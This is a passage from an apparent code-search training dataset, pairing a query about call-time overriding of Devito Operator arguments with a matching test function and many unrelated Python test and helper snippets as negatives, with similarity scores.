print(ast.collapse_indices(ast.build_indices()))\n\n print(execution.evaluate_expression('1+2+3+4', environment.Environment()))\n print(execution.evaluate_expression('45+7*8', environment.Environment()))\n print(execution.evaluate_expression('3.2+18^2-7', environment.Environment()))\n print(execution.evaluate_expression('1:2 + 1:3 + 1:5', environment.Environment()))\n print(execution.evaluate_expression('2:3 + 3^3 - 1:5', environment.Environment()))\n print(execution.evaluate_expression('1234', environment.Environment()))\n \n ast = ast2.AST(\"3 + 1 == 4\")\n print(ast.parse())\n ast = ast2.AST(\"3 + 1 > 4\")\n print(ast.parse())\n ast = ast2.AST(\"18:1 != 18.2\")\n print(ast.parse())\n ast = ast2.AST(\"x = 4\")\n print(ast.parse())\n ast = ast2.AST(\"y = 3 > 4\")\n print(ast.parse())\n \n env2 = environment.Environment()\n execution.execute_statement('x = 3+5*4', env2)\n execution.execute_statement('y = x + 19 - 3*6', env2)\n print(env2.frames)\n elif first_arg == '--test2':\n ast = ast2.AST('x = \"ice cream, eggs, and milk\" + \"...alpha or beta\"')\n print(ast.parse())\n ast = ast2.AST('y = f(1 + 1, 2 + 2, 3 + 3) - g((9+7)*2, 128/(2+2))')\n print(ast.parse())\n ast = ast2.AST('z = f(\"ice cream\", \"eggs and milk\") * g(\"alpha or beta\", 3:8, \"gamma or delta\")')\n print(ast.parse())\n ast = ast2.AST('makeList(1,2,3) + makeList(4,5,6)')\n print(ast.parse())\n ast = ast2.AST('[max(16, 25), max(36, max(49, 64))]')\n print(ast.parse())\n ast = ast2.AST('[concat_lists([10], [20]), concat_lists([30], [40])]')\n print(ast.parse())\n elif first_arg == '--test3':\n ast = ast2.AST('[1, 2, 3]')\n print(ast.split_list_elems())\n ast = ast2.AST('[f(2), f(3), f(4)]')\n print(ast.split_list_elems())\n ast = ast2.AST('[f(2, 3), f(3, 4, 5), f(4, 1)]')\n print(ast.split_list_elems())\n ast = ast2.AST('1 + 2 * 3')\n print(ast.split_list_elems())\n print(ast.parse())\n elif first_arg == '--test4':\n ast = ast2.AST('x.length()')\n print(ast.parse())\n ast = ast2.AST('[1,2,3].length()')\n print(ast.parse())\n ast = ast2.AST('3.01')\n print(ast.parse())\n ast = ast2.AST('3.1')\n print(ast.parse())\n elif first_arg == '--test5':\n env = environment.Environment()\n env.new_type(['Number'], 'ComplexNumber')\n c = {'$type': 'ComplexNumber', 'real': 1, 'imag': 2}\n print(env.value_is_a(c, 'ComplexNumber'))\n print(env.value_is_a(c, 'Number'))\n print(env.value_is_a(c, 'Int'))\n print(\"\")\n env.new_type(['Object'], 'Food')\n env.new_type(['Food'], 'Pizza')\n env.new_type(['Food'], 'Dessert')\n env.new_type(['Dessert'], 'ChocolateItem')\n env.new_type(['Pizza'], 'PepperoniPizza')\n env.new_type(['Pizza', 'ChocolateItem'], 'ChocolatePizza')\n pepperoni_pizza = {'$type': 'PepperoniPizza'}\n chocolate_pizza = {'$type': 'ChocolatePizza'}\n print(env.value_is_a(pepperoni_pizza, 'PepperoniPizza'))\n print(env.value_is_a(pepperoni_pizza, 'Pizza'))\n print(env.value_is_a(pepperoni_pizza, 'Food'))\n print(env.value_is_a(pepperoni_pizza, 'Dessert'))\n print(env.value_is_a(pepperoni_pizza, 'ChocolateItem'))\n print(\"\")\n print(env.value_is_a(chocolate_pizza, 'PepperoniPizza'))\n print(env.value_is_a(chocolate_pizza, 'Pizza'))\n print(env.value_is_a(chocolate_pizza, 'Food'))\n print(env.value_is_a(chocolate_pizza, 'Dessert'))\n print(env.value_is_a(chocolate_pizza, 'ChocolateItem'))\n print(\"\")\n env.new_type(['ChocolatePizza'], 'HugeChocolatePizza')\n huge_chocolate_pizza = {'$type': 'HugeChocolatePizza'}\n print(env.value_is_a(huge_chocolate_pizza, 'PepperoniPizza'))\n print(env.value_is_a(huge_chocolate_pizza, 'Pizza'))\n print(env.value_is_a(huge_chocolate_pizza, 'Food'))\n print(env.value_is_a(huge_chocolate_pizza, 'Dessert'))\n print(env.value_is_a(huge_chocolate_pizza, 'ChocolateItem'))\n print(env.value_is_a(huge_chocolate_pizza, 'ChocolatePizza'))\n print(\"\")\n elif first_arg == '--test6':\n ast = ast2.AST('{1, 2 | 3, 4}')\n print(ast.parse())\n elif first_arg == '--test7':\n ast = ast2.AST('throw \"something\"')\n print(ast.parse())\n elif first_arg == '--test8':\n ast = ast2.AST('true and not false')\n print(ast.parse())\n print(ast.collapse_indices(ast.build_indices()))\n elif first_arg == '--test9':\n sample = \"\"\"\n x = 5 // comment\n // comment\n /* multi\n line\n comment\n */y = 6\n z = \"https://example.com\"\n \"\"\"\n print(prepare_program.preprocess(sample))\n elif first_arg == '--test10':\n ast = ast2.AST('-3.0e5 + 186e-20 * 1e-6 / 28.8e+6 + 34.4e+99')\n print(ast.parse())\n ast = ast2.AST('-3.0E5 + 186E-20 * 1E-6 / 28.8e+6 + 34.4E+99')\n print(ast.parse())\n elif first_arg == '--test11':\n print(execution.is_assignment_statement('a = 5'))\n print(execution.is_assignment_statement('a=5==6'))\n print(execution.is_assignment_statement('not (5==6) and (8>=7)'))\n print(execution.is_assignment_statement('z='))\n elif first_arg == '--test12':\n lines = [\n 'sub this + that',\n 'func Int x + this',\n 'func x + this',\n 'func this * y',\n 'func Int -this',\n 'sub -this',\n 'sub not this',\n 'sub Boolean not this',\n 'sub this-b',\n 'sub b-this',\n 'func Int-this',\n 'func Int- this',\n 'sub Int - this'\n ]\n print(prepare_program.replace_op_overload_syntax(lines))\n elif first_arg == '--test-tree-merge':\n tests.test_tree_merge()\n elif first_arg == '--test-all':\n tests.test_all('capacita_programs')\n elif first_arg == '--test-all-fast':\n tests.test_all('capacita_programs', has_delay=False)\n elif first_arg == '--test-repl':\n tests.test_all('capacita_programs', has_delay=True, use_repl=True)\n elif first_arg == '--test-repl-fast':\n tests.test_all('capacita_programs', has_delay=False, use_repl=True)\n elif first_arg == '--test-file' and argc > 2:\n if argc == 4 and sys.argv[2] == '--repl':\n tests.test_file(sys.argv[3], use_repl=True)\n else:\n tests.test_file(sys.argv[2], use_repl=False)\n else:\n # Run a program from a text file:\n file_name = first_arg\n execute_file(file_name)\n exit()\n repl()", "def test_alpine1(self):\n fun = get_problem('alpine1', self.dimension, -10.0, 10.0)\n self.assertEqual(fun(self.array), 0.0)", "def testfunction(expr,n):\n \n if expr == g_plus: init, expr = R1d.SpinUp, g_plus\n elif expr == g_minus: init, expr = R1d.SpinDown, g_minus\n else: return \"error\"\n \n a = McLaurin(expr, n) \n \n bool_list = []\n for n in range(5):\n for i in range(-n,n+1):\n bool_list.append(Coef(a,n,i) == R1d.a(n,i, init))\n if bool_list[-1] == False:\n print(\"Step: \", n, \" pos: \", i)\n return all(bool_list)", "def test_lifted_index_xarray(index_xarray_data):\n result = lifted_index(index_xarray_data.isobaric, index_xarray_data.temperature,\n index_xarray_data.profile)\n assert_array_almost_equal(result, np.full((1, 1, 2, 3), 7) * units.delta_degC)", "def test_cost_consideration():\n # input\n net = create_test_net()\n idx = pp.create_sgen(net, 1, 1.3, index=2)\n pp.create_poly_cost(net, idx, \"sgen\", 2.3, index=4)\n pp.runpp(net)\n assert all(net.sgen.index.values == np.array([0, 5, 2]))\n assert all(net.poly_cost.element == np.array([0, 0, 5, 2]))\n\n for cost_type in [\"poly_cost\", \"pwl_cost\"]:\n\n if cost_type == \"pwl_cost\":\n for poly in net.poly_cost.itertuples():\n net.poly_cost.drop(poly.Index, inplace=True)\n pp.create_pwl_cost(net, poly.element, poly.et, [[0, 20, 1]], index=poly.Index)\n\n # eq generation\n boundary_buses = [0, 2]\n internal_buses = [1]\n eq_net1 = pp.grid_equivalents.get_equivalent(net, \"rei\", boundary_buses, internal_buses)\n eq_net2 = pp.grid_equivalents.get_equivalent(net, \"rei\", boundary_buses, internal_buses,\n return_internal=False)\n\n # check elements\n check_elements_amount(eq_net1, {\"bus\": 6, \"load\": 3, \"sgen\": 3, \"shunt\": 5, \"ext_grid\": 1,\n \"line\": 2, \"impedance\": 10, cost_type: 4},\n check_all_pp_elements=True)\n check_elements_amount(eq_net2, {\"bus\": 5, \"load\": 3, \"sgen\": 2, \"shunt\": 5, \"ext_grid\": 1,\n \"impedance\": 10, cost_type: 3},\n check_all_pp_elements=True)\n assert all(eq_net1.sgen.index.values == np.array([0, 1, 2])) # simple create_sgen()\n # without index=... expected\n assert all(eq_net2.sgen.index.values == np.array([0, 1]))\n\n # --- check poly cost\n # eq_net1\n assert np.all(net[cost_type].loc[net[cost_type].et == \"ext_grid\"].values ==\n eq_net1[cost_type].loc[eq_net1[cost_type].et == \"ext_grid\"])\n for i in range(3):\n idx_net = net.sgen.sort_values(\"p_mw\").index[i]\n idx_eq_net = eq_net1.sgen.sort_values(\"p_mw\").index[i]\n assert np.all(net[cost_type].loc[(net[cost_type].element == idx_net) &\n (net[cost_type].et == \"sgen\")].drop(\n columns=[\"element\"]).values ==\n eq_net1[cost_type].loc[(eq_net1[cost_type].element == idx_eq_net) &\n (eq_net1[cost_type].et == \"sgen\")].drop(\n columns=[\"element\"]).values)\n\n # eq_net2\n assert np.all(net[cost_type].loc[net[cost_type].et == \"ext_grid\"].values ==\n eq_net2[cost_type].loc[eq_net2[cost_type].et == \"ext_grid\"])\n for i in range(2):\n idx_net = net.sgen.loc[~net.sgen.bus.isin(boundary_buses+internal_buses)].sort_values(\n \"p_mw\").index[i]\n idx_eq_net = eq_net2.sgen.sort_values(\"p_mw\").index[i]\n assert np.all(net[cost_type].loc[(net[cost_type].element == idx_net) &\n (net[cost_type].et == \"sgen\")].drop(\n columns=[\"element\"]).values ==\n eq_net2[cost_type].loc[(eq_net2[cost_type].element == idx_eq_net) &\n (eq_net2[cost_type].et == \"sgen\")].drop(\n columns=[\"element\"]).values)", "def test_binops(self):", "def test_ex_2_7(self):\n\n wam = WAM()\n wam.execute(self.fig_2_9_instrs[:-1]) # last instruction is call; remove it\n wam.execute(self.fig_2_10_instrs)\n aW = wam.deref_reg(4)\n aX = wam.deref_reg(4)\n aY = wam.deref_reg(5)\n aZ = wam.deref_reg(1)\n self.assertEqual(wam.get_term_repr(aW), 'f(a)')\n self.assertEqual(wam.get_term_repr(aX), 'f(a)')\n self.assertEqual(wam.get_term_repr(aY), 'f(f(a))')\n self.assertEqual(wam.get_term_repr(aZ), 'f(f(a))')", "def at_b (self):\n self.argc = int((len(n.coord[0]))/2)\n self.pts_con = np.array(self.coord[:,self.argc:len(n.coord[0])])\n\n self.xd = self.xdi\n self.zd = self.zdi \n \n for i, x in enumerate(self.xdi):\n self.aux_con = self.pts_con[0] - x \n self.arg1 = np.argmin(abs(self.aux_con)) \n \n if (self.aux_con[self.arg1] < 0 and self.arg1 == 0) or (self.aux_con[self.arg1] > 0 and self.arg1 == len(self.aux_con)-1):\n self.yd[i] = 99999.\n #print(self.yd[i],self.arg1)\n #print(self.aux_con)\n \n elif (self.aux_con[self.arg1] > 0 and self.aux_con[self.arg1+1] > self.aux_con[self.arg1]): #(self.aux_con[self.arg1] < 0 and self.aux_con[self.arg1-1] > self.aux_con[self.arg1]) or \n self.yd[i] = 99999.\n #print(self.yd[i],self.arg1)\n #print(self.aux_con)\n \n elif self.aux_con[self.arg1] < 0:\n #print(self.arg1)\n self.arg1 = self.arg1 + self.argc\n self.arg2 = self.arg1 - 1\n self.yd[i] = self.coord[1,n.arg1] + (x-self.coord[0,n.arg1])*(self.coord[1,n.arg2]-self.coord[1,n.arg1])/(self.coord[0,n.arg2]-self.coord[0,n.arg1])\n #print(self.yd[i],self.arg1,self.arg2)\n #print(self.aux_con)\n\n elif self.aux_con[self.arg1] > 0:\n #print(self.arg1) \n self.arg1 = self.arg1 + self.argc\n self.arg2 = self.arg1 + 1\n self.yd[i] = self.coord[1,n.arg1] + (x-self.coord[0,n.arg1])*(self.coord[1,n.arg2]-self.coord[1,n.arg1])/(self.coord[0,n.arg2]-self.coord[0,n.arg1]) \n #print(self.yd[i],self.arg1,self.arg2)\n #print(self.aux_con)\n \n #print('Defensa {0}\\n{1}: {2}\\n{3}: {4}'.format(i,self.arg1,self.aux_con[self.arg1],self.arg2,self.aux_con[self.arg2])) \n \n #self.yd = self.yd\n self.b = np.array([self.xd,self.yd,self.zd])\n #self.b.loc[:,('y')] = self.b.loc[:,('y')] ", "def border_function_generator(self, stencil):\n\n def is_on_border(indice):\n for i in range(self.dim):\n if indice[0] < stencil.b[0][0] or indice[0] >= self.mid.shape[0]+stencil.b[0][0]:\n return True\n return is_on_border", "def convert_where_index(g, op, block):\n\n condition = g.get_node(op.input(\"Condition\")[0])\n out = _op.argwhere(condition)\n g.add_node(op.output(\"Out\")[0], out)", "def test_ud_cnot():\n program = dedent(\n \"\"\"\\\n register q0[0]\n register q1[1]\n register q2[2]\n register q3[3]\n X q2\n CNOT q2 q0\n \"\"\"\n )\n\n result = run(program, run_gate_array)\n assert isclose(result, [1.0, 0.0, 1.0, 0.0]).all()", "def test_psx_zsx_special_cases(self):\n oqed_psx = OneQubitEulerDecomposer(basis=\"PSX\")\n oqed_zsx = OneQubitEulerDecomposer(basis=\"ZSX\")\n oqed_zsxx = OneQubitEulerDecomposer(basis=\"ZSXX\")\n theta = np.pi / 3\n phi = np.pi / 5\n lam = np.pi / 7\n test_gates = [\n UGate(np.pi, phi, lam),\n UGate(-np.pi, phi, lam),\n # test abs(lam + phi + theta) near 0\n UGate(np.pi, np.pi / 3, 2 * np.pi / 3),\n # test theta=pi/2\n UGate(np.pi / 2, phi, lam),\n # test theta=pi/2 and theta+lam=0\n UGate(np.pi / 2, phi, -np.pi / 2),\n # test theta close to 3*pi/2 and theta+phi=2*pi\n UGate(3 * np.pi / 2, np.pi / 2, lam),\n # test theta 0\n UGate(0, phi, lam),\n # test phi 0\n UGate(theta, 0, lam),\n # test lam 0\n UGate(theta, phi, 0),\n ]\n\n for gate in test_gates:\n unitary = gate.to_matrix()\n qc_psx = oqed_psx(unitary)\n qc_zsx = oqed_zsx(unitary)\n qc_zsxx = oqed_zsxx(unitary)\n self.assertTrue(np.allclose(unitary, Operator(qc_psx).data))\n self.assertTrue(np.allclose(unitary, Operator(qc_zsx).data))\n self.assertTrue(np.allclose(unitary, Operator(qc_zsxx).data))" ]
[ "0.6950202", "0.58628595", "0.56040186", "0.5595086", "0.5519812", "0.54418904", "0.54108006", "0.533119", "0.53181374", "0.53098184", "0.5292402", "0.5292149", "0.5247795", "0.5246134", "0.523379", "0.5228938", "0.5216184", "0.51775336", "0.51391", "0.513825", "0.51371264", "0.5125601", "0.51237714", "0.5118783", "0.5106406", "0.5094798", "0.50782824", "0.50654495", "0.50590676", "0.5056554", "0.50441825", "0.50390106", "0.50383204", "0.5019494", "0.4996368", "0.4975851", "0.49692708", "0.49681807", "0.4968043", "0.49635723", "0.49625936", "0.49616665", "0.495337", "0.49505645", "0.4943826", "0.49414274", "0.49384204", "0.49280557", "0.49273977", "0.4924433", "0.49242586", "0.49241883", "0.49174675", "0.49077767", "0.489369", "0.488927", "0.48886022", "0.48859486", "0.4884594", "0.48817906", "0.48758838", "0.48735794", "0.48668125", "0.48631883", "0.48626083", "0.4862096", "0.48617166", "0.48517752", "0.4842776", "0.48379698", "0.48335326", "0.4831361", "0.48308483", "0.4827149", "0.48253846", "0.48238868", "0.48219004", "0.48201695", "0.4819852", "0.48100322", "0.48065498", "0.4801199", "0.4801016", "0.47915724", "0.47905988", "0.47899622", "0.47887725", "0.4780322", "0.47772622", "0.4776111", "0.47730157", "0.47672412", "0.476177", "0.47587708", "0.47571555", "0.47538033", "0.47502536", "0.47407544", "0.4734952", "0.47343642" ]
0.6362784
1
Test that the calltime overriding of Operator arguments works
def test_override_cache_aliasing(self): i, j, k, l = dimify('i j k l') a = symbol(name='a', dimensions=(i, j, k, l), value=2., mode='indexed').base.function a1 = symbol(name='a', dimensions=(i, j, k, l), value=3., mode='indexed').base.function a2 = symbol(name='a', dimensions=(i, j, k, l), value=4., mode='indexed').base.function eqn = Eq(a, a+3) op = Operator(eqn) op() op(a=a1) op(a=a2) shape = [d.size for d in [i, j, k, l]] assert(np.allclose(a.data, np.zeros(shape) + 5)) assert(np.allclose(a1.data, np.zeros(shape) + 6)) assert(np.allclose(a2.data, np.zeros(shape) + 7))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __call__(a, b):", "def _OverloadOperator(operator): # pylint: disable=invalid-name\n\n tensor_oper = getattr(ops.Tensor, operator)\n\n def _run_op(a, *args):\n # pylint: disable=protected-access\n value = a._AsTensor()\n return tensor_oper(value, *args)\n\n # Propagate __doc__ to wrapper\n try:\n _run_op.__doc__ = tensor_oper.__doc__\n except AttributeError:\n pass\n\n setattr(ZfitBaseVariable, operator, _run_op)", "def test_direct_invocation_works():\n assert (_add)(*[1, 2], **{\"3\": 3, \"4\": 4}) == 10", "def test_dup_args_in_call(x):\n return x * x", "def test_dup_args_in_call(x):\n return x * x", "def _OverloadOperator(operator): # pylint: disable=invalid-name\n\n tensor_oper = getattr(ops.Tensor, operator)\n\n def _run_op(a, *args):\n # pylint: disable=protected-access\n value = a._AsTensor()\n return tensor_oper(value, *args)\n\n # Propagate __doc__ to wrapper\n try:\n _run_op.__doc__ = tensor_oper.__doc__\n except AttributeError:\n pass\n\n setattr(ComposedVariable, operator, _run_op)", "def _equal_to_op(spec):", "def _binaryop(self, other, op: str):\n raise NotImplementedError", "def base_operator(self):\n raise NotImplementedError()", "def operate(\n self, op: OperatorType, *other: Any, **kwargs: Any\n ) -> Operators:\n raise NotImplementedError(str(op))", "def _override_operator(class_object, operator, func):\n existing = getattr(class_object, operator, None)\n if existing is not None:\n # Check to see if this is a default method-wrapper or slot wrapper which\n # will be true for the comparison operators.\n if not isinstance(existing, type(object.__lt__)) and not isinstance(existing, type(object.__repr__)):\n raise ValueError(\"operator %s cannot be overwritten again on class %s.\" %(operator, class_object))\n setattr(class_object, operator, func)", "def test_operator(self):\n\t\tfor op in self.ops:\n\t\t\tself.filter.set_operator(op)\n\t\t\tself.assertEqual(self.filter.operator.value, op)", "def test_multi_arg_workaround():\n\n @type_checked\n def _run_test(ok:MySubClassedObject):\n assert ok.x == 1\n assert ok.y == 2\n\n _run_test((1, 2))", "def __call__(self, *inputs):\n raise NotImplementedError", "def __call__(self, x):", "def testOperation(self):\n gen = self.gen\n prof = self.profile\n\n # Try the direct evaluation\n gen.operation()\n self.assertTrue(array_equal(prof.x, prof.ycalc))\n\n # Try evaluation through __call__\n gen(prof.x)\n self.assertTrue(array_equal(prof.x, prof.ycalc))\n return", "def test_wrapper_with_args():\n my_method = SGMethod(\"test\")\n other_method = SGMethod(\"other\")\n par1 = other_method.create_parameter(\"par1\")\n \n my_method.calls(other_method, ['\"test\"'])\n my_method.check_call_validity();\n \n assert other_method == my_method.method_called\n assert len(my_method.args) == 1\n assert par1 != my_method.args[0]\n assert '\"test\"' == my_method.args[0]", "def check_args(*args):\n if not len(args) == 3:\n raise OperatorCompileException(compile_time_error(*args))\n if not getattr(operator, args[1]):\n raise OperatorCompileException(*args)", "def __nonzero__(*args, **kwargs):\n \n pass", "def __call__(value):", "def _OverloadAllOperators(): # pylint: disable=invalid-name\n for operator in ops.Tensor.OVERLOADABLE_OPERATORS:\n ZfitBaseVariable._OverloadOperator(operator)\n # For slicing, bind getitem differently than a tensor (use SliceHelperVar\n # instead)\n # pylint: disable=protected-access\n setattr(ZfitBaseVariable, \"__getitem__\", array_ops._SliceHelperVar)", "def __call__(self, x):\n pass", "def test_override_symbol(self):\n i, j, k, l = dimify('i j k l')\n a = symbol(name='a', dimensions=(i, j, k, l), value=2.)\n a1 = symbol(name='a1', dimensions=(i, j, k, l), value=3.)\n a2 = symbol(name='a2', dimensions=(i, j, k, l), value=4.)\n op = Operator(Eq(a, a + 3))\n op()\n op(a=a1)\n op(a=a2)\n shape = [d.size for d in [i, j, k, l]]\n\n assert(np.allclose(a.data, np.zeros(shape) + 5))\n assert(np.allclose(a1.data, np.zeros(shape) + 6))\n assert(np.allclose(a2.data, np.zeros(shape) + 7))", "def __call__(self, a, b):\n # STUDENT CODE HERE\n raise NotImplementedError", "def __call__(self, a, b):\n # STUDENT CODE HERE\n raise NotImplementedError", "def __call__(self, a, b):\n # STUDENT CODE HERE\n raise NotImplementedError", "def __init__(self):\n super(OperatorCodegen, self).__init__()", "def test_custom_operators():\n grid = UnitGrid([32])\n field = ScalarField.random_normal(grid)\n eq = PDE({\"u\": \"undefined(u)\"})\n\n with pytest.raises(ValueError):\n eq.evolution_rate(field)\n\n def make_op(state):\n return lambda state: state\n\n UnitGrid.register_operator(\"undefined\", make_op)\n\n eq._cache = {} # reset cache\n res = eq.evolution_rate(field)\n np.testing.assert_allclose(field.data, res.data)\n\n del UnitGrid._operators[\"undefined\"] # reset original state", "def _OverloadAllOperators(): # pylint: disable=invalid-name\n for operator in ops.Tensor.OVERLOADABLE_OPERATORS:\n ComposedVariable._OverloadOperator(operator)\n # For slicing, bind getitem differently than a tensor (use SliceHelperVar\n # instead)\n # pylint: disable=protected-access\n setattr(ComposedVariable, \"__getitem__\", array_ops._SliceHelperVar)", "def __call__(self, args):", "def __call__(self, args, kwargs):\n raise NotImplementedError", "def test_binops(self):", "def test_add():\n\n assert add(1, 1) == 2\n assert add(1, 2) == add(2, 1) == 3", "def _append_operator(self, operator):", "def test_kwargs(self):\n\n @sync_performer\n def p(dispatcher, intent, extra):\n return extra\n\n dispatcher = lambda _: partial(p, extra=\"extra val\")\n result = sync_perform(dispatcher, Effect(\"foo\"))\n self.assertEqual(result, \"extra val\")", "def __call__(self, *args, **kwargs): # real signature unknown\n pass", "def _support_op(*args):\n def inner(func):\n for one_arg in args:\n _op_mapping_[one_arg] = func\n return func\n\n return inner", "def test_invocation_order(foo):\n assert foo.value == 2", "def test_operator_adapt(self):\n\n # test string concatenation\n expr = test_table.c.data + \"somedata\"\n assert testing.db.execute(select([expr])).scalar() == \"somedatasomedata\"\n\n expr = test_table.c.id + 15\n assert testing.db.execute(select([expr])).scalar() == 16\n\n # test custom operator conversion\n expr = test_table.c.avalue + 40\n assert expr.type.__class__ is test_table.c.avalue.type.__class__\n\n # value here is calculated as (250 - 40) / 10 = 21\n # because \"40\" is an integer, not an \"avalue\"\n assert testing.db.execute(select([expr.label('foo')])).scalar() == 21\n\n expr = test_table.c.avalue + literal(40, type_=MyCustomType)\n \n # + operator converted to -\n # value is calculated as: (250 - (40 * 10)) / 10 == -15\n assert testing.db.execute(select([expr.label('foo')])).scalar() == -15\n\n # this one relies upon anonymous labeling to assemble result\n # processing rules on the column.\n assert testing.db.execute(select([expr])).scalar() == -15", "def test_no_mutually_exclusive_args_provided(self):\n _func = mutually_exclusive_parameters('arg1', 'arg2')(undecorated_func)\n self.assertEqual(_func(), 'foo')\n self.assertEqual(_func(arg3='hello'), 'foo')", "def __pow__(self, *args, **kwargs): # real signature unknown\n pass", "def __pow__(self, *args, **kwargs): # real signature unknown\n pass", "def __pow__(self, *args, **kwargs): # real signature unknown\n pass", "def __pow__(self, *args, **kwargs): # real signature unknown\n pass", "def __pow__(self, *args, **kwargs): # real signature unknown\n pass", "def __pow__(self, *args, **kwargs): # real signature unknown\n pass", "def __pow__(self, *args, **kwargs): # real signature unknown\n pass", "def __pow__(self, *args, **kwargs): # real signature unknown\n pass", "def __pow__(self, *args, **kwargs): # real signature unknown\n pass", "def __pow__(self, *args, **kwargs): # real signature unknown\n pass", "def __pow__(self, *args, **kwargs): # real signature unknown\n pass", "def __pow__(self, *args, **kwargs): # real signature unknown\n pass", "def __pow__(self, *args, **kwargs): # real signature unknown\n pass", "def __pow__(self, *args, **kwargs): # real signature unknown\n pass", "def __pow__(self, *args, **kwargs): # real signature unknown\n pass", "def __pow__(self, *args, **kwargs): # real signature unknown\n pass", "def _arg_swapper(op):\n\n def op_swapped(a, b, *args, **kwargs):\n return op(b, a, *args, **kwargs)\n\n return op_swapped", "def test_arithmetic_preserves_superrep(superrep,\n operation, check_op, check_scalar):\n dims = [[[2], [2]], [[2], [2]]]\n shape = (4, 4)\n S1 = Qobj(np.random.random(shape), superrep=superrep, dims=dims)\n S2 = Qobj(np.random.random(shape), superrep=superrep, dims=dims)\n x = np.random.random()\n\n check_list = []\n if check_op:\n check_list.append(operation(S1, S2))\n if check_scalar:\n check_list.append(operation(S1, x))\n if check_op and check_scalar:\n check_list.append(operation(x, S2))\n\n for S in check_list:\n assert S.type == \"super\"\n assert S.superrep == superrep", "def test_neg_operate_with_extra_parameter(self):\n key = (\"test\", \"demo\", 1)\n policy = {}\n llist = [{\"op\": aerospike.OPERATOR_PREPEND, \"bin\": \"name\", \"val\": \"ram\"}]\n with pytest.raises(TypeError) as typeError:\n self.as_connection.operate(key, llist, {}, policy, \"\")\n\n assert \"operate() takes at most 4 arguments (5 given)\" in str(typeError.value)", "def test_xcomarg_shift(self, test_dag):\n # Unpack the fixture\n dag, (op1, op2, op3, op4) = test_dag\n # Arrange the operators with a Label in the middle\n op1_arg = XComArg(op1, \"test_key\")\n op1_arg >> Label(\"Label 1\") >> [op2, op3]\n op1_arg >> op4\n # Check that the DAG has the right edge info\n assert dag.get_edge_info(op1.task_id, op2.task_id) == {\"label\": \"Label 1\"}\n assert dag.get_edge_info(op1.task_id, op4.task_id) == {}", "def __call__(self, *args, **kw):\n ...", "def dummy_fn(self, *args, **kwargs):", "def __call__(obj):", "def test_vargs(self):", "def test_pos():\n # Test for positive special method with scalar Rnode object\n x = Rnode(5)\n z = +x\n try:\n assert z.value == 1 * x.value\n except AssertionError as e:\n print(e)\n raise AssertionError", "def test_parameterless_calls(self):\n for attr in dir(api):\n func = getattr(api, attr)\n if callable(func): \n spec = inspect.getargspec(func)\n if not spec.args and not spec.varargs and not spec.keywords and not spec.defaults:\n func()", "def test_add_consistency2(self) -> None:\n a = Constant(\n 'const1',\n Float32(),\n np.zeros([1, 3, 3])\n )\n b = Constant(\n 'const2',\n Float32(),\n np.zeros([2])\n )\n input_ops = {'A': cast(Operator, a), 'B': cast(Operator, b)}\n try:\n Add(\n 'add1',\n [1, 3, 3],\n Float32(),\n input_ops\n )\n except AssertionError:\n print(\"Consistency test for 'Add' #2 passed!\")\n\n else:\n self.assertTrue(False, \"Consistency test for 'Add' #2 failed.\")", "def _op_bool(self, op: str, other: t.Any) -> bool:\n if hasattr(self.__members__, op):\n if isinstance(other, InspectableSet):\n other = other.__members__\n return getattr(self.__members__, op)(other)\n return NotImplemented", "def dummy(*args, **kwargs):\r\n pass", "def __call__(object):", "def _op(\n x: Union[int, float, dts.Number, tps.NumericValue],\n y: Union[int, float, dts.Number, tps.NumericValue],\n ) -> T:", "def __call__(self, param, xyz=False):\n pass", "def test_matmul():\n class Vector:\n def __init__(self, *args):\n self.args = args\n \n def __matmul__(self, other):\n if not isinstance(other, Vector):\n return NotImplemented\n return sum(i*j for i, j in zip(self.args, other.args))\n \n v1 = Vector(1, 2)\n v2 = Vector(1, 2)\n assert v1@v2 == 5\n a = Step('a')\n assert do_eval(a @ v1, a=v2) == v1@v2\n a = Step('a')\n assert do_eval(v1 @ a, a=v2) == v1@v2", "def test_add_consistency1(self) -> None:\n a = Constant(\n 'const1',\n Float32(),\n np.zeros([1, 3, 3])\n )\n b = Constant(\n 'const2',\n Float32(),\n np.zeros([3])\n )\n input_ops = {'A': cast(Operator, a), 'B': cast(Operator, b)}\n Add(\n 'add1',\n [1, 3, 3],\n Float32(),\n input_ops\n )\n\n print(\"Consistency test for 'Add' #1 passed!\")", "def test(arg1, arg2):\n return arg1 + arg2", "def test_no_requirements(self):\n def f():\n pass\n self._run_as_operator(f)", "def test_iadd():\n #test instance += instance expression\n circle = Circle(2) \n circle += circle\n assert circle == Circle(4)\n # test += 2 expression\n circle = Circle(2)\n circle += 2\n assert circle == Circle(4)", "def __call__(self, *args):\n assert is_symbol(self.op) and not self.args\n return Expr(self.op, *args)", "def __call__(self, *args, **kwargs):\r\n raise NotImplementedError", "def __call__(self, *args, **kwargs):\r\n raise NotImplementedError", "def __call__(self, *args, **kwargs):\r\n raise NotImplementedError", "def __pow__(self,*args):\r\n pass", "def apply(self, *args: _Data) -> _Data:", "def _inherit_binary_operation(self, other, op):\n sdata = self.data\n if isinstance(op, basestring) and hasattr(sdata, op):\n bound_op = getattr(sdata, op)\n else:\n def bound_op(odata):\n return op(sdata, odata)\n\n bset = self.bset\n if isinstance(other, type(self)) or isinstance(self, type(other)):\n obset = other.bset\n if not ((bset == obset) or\n bset.shape == () or\n obset.shape == ()):\n raise ValueError(\"instances of {} must be defined over \"\n \"instances of {} that compare equal for \"\n \"binary operations to be defined\"\n .format(self.__class__.__name__,\n bset.__class__.__name__))\n new_data = bound_op(other.data)\n if bset.shape == ():\n bset = obset\n else:\n new_data = bound_op(other)\n\n return type(self)(new_data, bset)", "def test_wrapper_with_params():\n my_method = SGMethod(\"test\")\n par = my_method.create_parameter(\"par1\")\n other_method = SGMethod(\"other\")\n par1 = other_method.create_parameter(\"par1\")\n \n my_method.calls(other_method)\n my_method.check_call_validity();\n \n assert other_method == my_method.method_called\n assert len(my_method.args) == 1\n assert par == my_method.args[0]", "def test_operation_kwarg(self, parse_input_mocked_metadata):\n bb = parse_input_mocked_metadata(\"Coherent(alpha=-0.3+2j) | 0\\n\")\n assert bb.operations == [\n {\"modes\": [0], \"op\": \"Coherent\", \"args\": [], \"kwargs\": {\"alpha\": -0.3 + 2j}}\n ]", "def reverse_operate(\n self, op: OperatorType, other: Any, **kwargs: Any\n ) -> Operators:\n raise NotImplementedError(str(op))", "def do_oprn(self, *args, operator=None, **kwargs):\n\t\tself.operator = operator\n\n\t\tif not self.operator:\n\t\t\treturn f'No operator provided'\n\n\t\tif self.operator == '+':\n\t\t\treturn self.sum(*args, 